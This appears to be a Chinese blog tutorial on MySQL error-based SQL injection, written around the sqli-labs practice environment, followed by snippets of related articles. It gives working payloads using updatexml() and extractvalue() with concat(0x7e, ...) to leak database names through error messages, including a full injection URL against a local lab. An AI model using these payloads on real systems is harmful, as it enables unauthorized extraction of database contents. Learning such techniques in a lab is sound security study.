sql的报错注入

最新推荐文章于 2024-09-14 18:42:05 发布
最新推荐文章于 2024-09-14 18:42:05 发布
阅读量125 收藏
点赞数
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53377571/article/details/125323392
版权

函数 updatexml(document,path,value);

作用 : 更改名为 document 的 xml 文档中的符合 path 的条件的值为 value。

document:是string格式,为xml文档的名称。
path:xpath的格式
value:string格式,替换找到的符合条件的数据。

例如下面的代码,以及执行效果:

select updatexml(1,concat(0x7e,(select username from `security`.users  limit 0,1),0x7e),1);

在这里插入图片描述
下面对语句进行逐层解析:
在这里插入图片描述
这里使用的0x7e代表的是十六进制的ascii码,可以查看表发现对应的符号为‘ ~ ’,0x5c代表的是反斜杠‘ \ ’ 使用这些都会造成语法错误,从而使数据库报出错,得到想要的信息。

函数:extractvalue(document,path)

作用:查找document的xml文件中的符合path路径的内容。

下面进行实例:


mysql> select extractvalue(1,database());     //出现空白表,因为语法正确,但没有找到
+----------------------------+
| extractvalue(1,database()) |
+----------------------------+
|                            |
+----------------------------+
1 row in set (0.01 sec)

mysql> select extractvalue(1,concat(0x7e,database()));    //现在让其语法错误,让其报错
ERROR 1105 (HY000): XPATH syntax error: '~security'
floor()

当你在使用concat函数将‘~’和你所要爆的内容构成一个字符串时,要注意:你要爆的信息前面要有“ ~ ” ,否则会出现下图状况:

在这里插入图片描述

sql-lab17 关 sql语句分析,读取数据库中库名:

在这里插入图片描述
在这里插入图片描述

http://127.0.0.1/sqli/Less-5/?id=-1' and updatexml(1,concat('~',(select schema_name from information_schema.schemata limit 3,1)),1)--+
Zt-type
关注
SQL报错注入
qq_64332865的博客
02-18 606
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
关于SQL报错注入原理详细解析
qq_45672254的博客
11-17 711
关于SQL报错注入原理详细解析 之前读过多篇关于Mysql报错注入之floor(rand(0)*2)报错原理探究的文章,都觉得原理阐述大同小异,但在具体细节上,还是不太明白,结合看过的文章和自己的理解,对SQL报错注入原理进行更细致的分析,身为一名网络安全小白,也是想和刚入门的同学一起研究sql注入原理,文章如果有错误的地方,希望大佬批评指正。有兴趣的同学可以查看此篇文章的链接,了解sql报错注入的一般原理:Mysql报错注入之floor(rand(0)*2)报错原理探究 在报错原理分析中,主要困惑我的地方
字符编码
q19880909的专栏
10-13 411
数据可以是数值、文字、图片以及声音、音频等各种形式的。计算机中的数据以二进制信息单元0、1表示。 计算机数据描述术语 位(bit):二进制的一个单位称为位,只能是1或0。 字节(byte): 8个位称为一个字节,可以表示ASCII中的一字符。 字(word): 若干个字节组成一个字。一个字包含的二进制位数称为字长。 计算机中数据的处理 计算机中CPU与内存之间传输数据的单位是一个字长,...
0x5E——shell编程学习笔记(2)
weixin_30296405的博客
06-09 340
这篇主要讲find (1)使用name选项find . -name "[A-Z]*" -print在当前目录及子目录中查找以大写字母开头的文件 (2)使用perm选项(按权限查找)find . -perm 755 -print在当前目录下查找文件权限位为755的文件。如果在755前加'-',那就表示755所提到的权限都有即可如果在755前加'+',表示755提到的权限只有有1个有就可...
【计算机基础】进制转换
happy_teemo的博客
10-05 465
二进制: 二进制转十进制: 0111 0101 = 2^6 + 2^5 + 2^4 + 2^2 + 2^0 = 64 + 32 + 16 + 4 + 1 = 117 十进制表示二进制: 1.把十进制数字拆分成多个2的整数次方之和,把每个拆分结果单独转换成二进制,最后把所有转换结果合并。 85 = 64 + 16 + 4 + 1 = 2^6 + 2^4 + 2^2 + 2^0 = 0100 0000 + 0001 0000 + 0000 0100
算法竞赛进阶指南0x5E 总结与练习
m0_73935863的博客
04-12 103
算法竞赛进阶指南0x5E 总结与练习
ASCII码表详解|键盘常用ASCII码|ASCII国际问题
haiross的专栏
03-09 2671
ASCII码表详解 ASCII码表 ASCII码大致可以分作三部分组成。 第一部分是:ASCII非打印控制字符 第二部分是:ASCII打印字符; 第三部分是:扩展ASCII打印字符 第一部分:ASCII非打印控制字符表 ASCII表上的数字0–31分配给了控制字符,用于控制像打印机等一些外围设备。例如,12代表换页/新页功能。此命令指示打印机跳到下一页的开头。(参
sql 报错注入
travelnight的博客
03-15 4108
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
SQL注入报错注入
qq_45557130的博客
10-07 566
sql注入报错注入
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 951
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
SQL初实践2)SQL报错注入
m0_64417923的博客
05-07 305
使用Extractvalue函数进行报错注入: 首先,Extractvalue函数对于“~”不能识别,“~”的ASCII码对应的是0x7e。 1.查询数据库名称 id=1 and extractv 1 and extractvalue(1,concat(0x7e,(select database()))) alue("anything",concat(0x7e,(select database())))# 得到 数据库名称:sqli 2.查询表名 1 union select 1,e.
HBase shell 中的十六进制数值表示
weixin_30752377的博客
06-28 667
在使用Hbase shell 进行get 或scan操作时,时不时会看到一些数值被转成了16进制, 就像下面那样 value=W\x5C5\x80 那么这个值具体等于多少? 查阅资料后发现算法如下 W -> W的ASCII码16进制 为 0x57 \x5C -> 就是16进制不变 0x5C 5 -> 5的ASCII码16进制 为 0x35 \x80 -> 就...
sql宽字节注入详解
Pz_mstr's Blog
10-12 3916
转载大牛离别歌的文章:https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 389
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2421
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
经典sql题(一)求连续登录不少于三天用户
最新发布
m0_58076578的博客
09-14 842
去重提取日期查询:提取每个用户的唯一登录日期。结果表table1:显示每个用户的唯一日期。为每个用户生成序列号查询:为每个用户的日期生成序号,并计算date2。结果表table2:显示用户的日期和对应的date2。步骤使用函数,按照日期顺序为每个用户的登录日期分配一个序号。例如,对于用户 ID = 1,假设他们的日期是2023-10-012023-10-02和2023-10-03将为它们生成序号 1、2 和 3。date2是通过将每个日期减去它的序号得到的。这个操作的目的是为了检测连续的日期。
sql报错注入读取文件
05-22
报错注入是一种常见的注入攻击技术,攻击者在构造SQL查询语句时,故意使用一些错误的语法或者参数,从而导致数据库执行错误,返回错误信息。 如果攻击者成功利用报错注入技术读取了数据库中的敏感信息,比如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值